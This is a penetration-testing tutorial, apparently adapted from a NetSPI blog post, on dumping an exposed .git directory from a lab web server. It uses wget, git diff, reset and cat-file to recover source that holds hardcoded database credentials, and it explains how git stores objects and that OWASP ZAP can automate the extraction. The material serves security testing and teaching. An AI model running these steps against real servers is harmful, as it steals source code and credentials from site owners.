Original article:
https://blog.netspi.com/dumping-git-data-from-misconfigured-web-servers/
The usual case:
The simplest way to check for a git repository is to look for a .git directory.
Tools such as Nessus, Nikto, and nmap can do this.
I usually start by checking the config file.
Next, fetch every file under the .git directory:
wget -r http://192.168.37.128/.git/
We now have the web server's Git repository:
root@kali:~/192.168.37.128: ls -al
total 12
drwxr-xr-x 3 root root 4096 Dec 26 14:28 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x 8 root root 4096 Dec 26 14:28 .git
root@kali:~/192.168.37.128#
git status shows the differences between our local copy and the web server:
root@kali:~/192.168.37.128: git status
# On branch master
# Changes not staged for commit:
# (use "git add/rm <file>..." to update what will be committed)
# (use "git checkout -- <file>..." to discard changes in working directory)
#
# deleted: index.php
#
no changes added to commit (use "git add" and/or "git commit -a")
We can see that index.php is missing from our repository.
For repositories with only a few files, we can diff the difference to view the contents of the missing files:
root@kali:~/192.168.37.128: git diff
diff --git a/index.php b/index.php
deleted file mode 100644
index 2bd0989..0000000
--- a/index.php
+++ /dev/null
@@ -1,13 +0,0 @@
-Hello World!
-
-<?php
-$servername = "localhost";
-$username = "admin";
-$password = "password";
-
-$conn = new mysqli($servername, $username, $password);
-
-if ($conn->connect_error) {
- die("Connection failed: " . $conn->connect_error);
-}
-?>
This lets us see the index.php file.
git reset --hard can be used to return to the state of the last commit.
root@kali:~/192.168.37.128: git reset --hard
HEAD is now at ec53e64 hello world
root@kali:~/192.168.37.128: ls -al
total 16
drwxr-xr-x 3 root root 4096 Dec 26 14:37 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x 8 root root 4096 Dec 26 14:37 .git
-rw-r--r-- 1 root root 238 Dec 26 14:37 index.php
root@kali:~/192.168.37.128:
git stores file information in the objects directory:
root@kali:~/192.168.37.128/.git/objects: ls -al
total 64
drwxr-xr-x 16 root root 4096 Dec 26 14:28 .
drwxr-xr-x 8 root root 4096 Dec 26 14:37 ..
drwxr-xr-x 2 root root 4096 Dec 26 14:28 04
drwxr-xr-x 2 root root 4096 Dec 26 14:28 07
drwxr-xr-x 2 root root 4096 Dec 26 14:28 26
drwxr-xr-x 2 root root 4096 Dec 26 14:28 2b
drwxr-xr-x 2 root root 4096 Dec 26 14:28 83
drwxr-xr-x 2 root root 4096 Dec 26 14:28 8d
drwxr-xr-x 2 root root 4096 Dec 26 14:28 8f
drwxr-xr-x 2 root root 4096 Dec 26 14:28 93
drwxr-xr-x 2 root root 4096 Dec 26 14:28 ae
drwxr-xr-x 2 root root 4096 Dec 26 14:28 ec
drwxr-xr-x 2 root root 4096 Dec 26 14:28 f2
drwxr-xr-x 2 root root 4096 Dec 26 14:28 f3
drwxr-xr-x 2 root root 4096 Dec 26 14:28 info
drwxr-xr-x 2 root root 4096 Dec 26 14:28 pack
There are directories with two-character names, and inside them are files named with seemingly random characters:
root@kali:~/192.168.37.128/.git/objects/2b: ls -al
total 12
drwxr-xr-x 2 root root 4096 Dec 26 14:28 .
drwxr-xr-x 16 root root 4096 Dec 26 14:28 ..
-rw-r--r-- 1 root root 171 Dec 26 13:32 d098976cb507fc498b5e8f5109607faa6cf645
These directories and the files inside them are in fact the SHA-1 hashes git creates for blob data. Each SHA-1 holds the bits and pieces of the files in the repository.
We can view the SHA-1 for index.php with the following command:
git cat-file -p master^{tree}
root@kali:~/192.168.37.128/.git: git cat-file -p master^{tree}
100644 blob 2bd098976cb507fc498b5e8f5109607faa6cf645 index.php
This command shows the SHA-1 of every file in the master branch.
We can pass these SHA-1 values to git cat-file to display the file contents:
root@kali:~/192.168.37.128/.git: git cat-file -p 2bd098976cb507fc498b5e8f5109607faa6cf645
Hello World!
<?php
$servername = "localhost";
$username = "admin";
$password = "password";
$conn = new mysqli($servername, $username, $password);
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
?>
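As an added example (not code from the original post), here is how the loose objects under .git/objects that git cat-file reads above are named and stored: the object id is the SHA-1 of a "<type> <size>\0" header plus the content, the file is zlib-compressed, and the id is split into a two-character directory and a 38-character file name (the page's blob 2bd098976c... lives at objects/2b/d098976c...). The sample content and the temporary .git directory are constructed for the demo.

```python
# Added example (not from the original post): how git names, stores and
# reads back the loose objects seen under .git/objects, without the git client.
import hashlib
import os
import tempfile
import zlib
from typing import Tuple


def git_object_id(obj_type: str, content: bytes) -> str:
    """SHA-1 over the header "<type> <size>\\0" followed by the raw content."""
    header = f"{obj_type} {len(content)}\0".encode()
    return hashlib.sha1(header + content).hexdigest()


def loose_object_path(git_dir: str, object_id: str) -> str:
    """Objects live at .git/objects/<first two hex chars>/<remaining 38>."""
    return os.path.join(git_dir, "objects", object_id[:2], object_id[2:])


def write_loose_object(git_dir: str, obj_type: str, content: bytes) -> str:
    """Store content the way git does: header + content, zlib-compressed."""
    object_id = git_object_id(obj_type, content)
    path = loose_object_path(git_dir, object_id)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    header = f"{obj_type} {len(content)}\0".encode()
    with open(path, "wb") as fh:
        fh.write(zlib.compress(header + content))
    return object_id


def read_loose_object(git_dir: str, object_id: str) -> Tuple[str, bytes]:
    """Inflate a loose object, split off the header and verify its SHA-1.

    Raises ValueError for a malformed header or for content that does not hash
    to the name it is stored under (a corrupted or tampered object)."""
    with open(loose_object_path(git_dir, object_id), "rb") as fh:
        raw = zlib.decompress(fh.read())
    header, sep, content = raw.partition(b"\0")
    if not sep:
        raise ValueError("missing NUL after object header")
    obj_type, size = header.decode().split(" ")
    if int(size) != len(content):
        raise ValueError("header size does not match content length")
    if git_object_id(obj_type, content) != object_id:
        raise ValueError("object content does not match its SHA-1 name")
    return obj_type, content


def demo() -> Tuple[str, str, bytes]:
    """Round-trip a constructed blob through a throwaway .git directory."""
    sample = b"Hello World!\n"  # constructed sample content
    git_dir = tempfile.mkdtemp(prefix="gitobj-")
    oid = write_loose_object(git_dir, "blob", sample)
    obj_type, content = read_loose_object(git_dir, oid)
    return oid, obj_type, content
```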
OWASP Zed Attack Proxy (ZAP) can automatically extract files (usually the application's source code) from an exposed git directory. One advantage of ZAP is that it does not require directory listing to be enabled; instead, ZAP parses the internal git files and extracts the code directly, without depending on extra tools such as the git client.
ZAP can also extract SVN directories.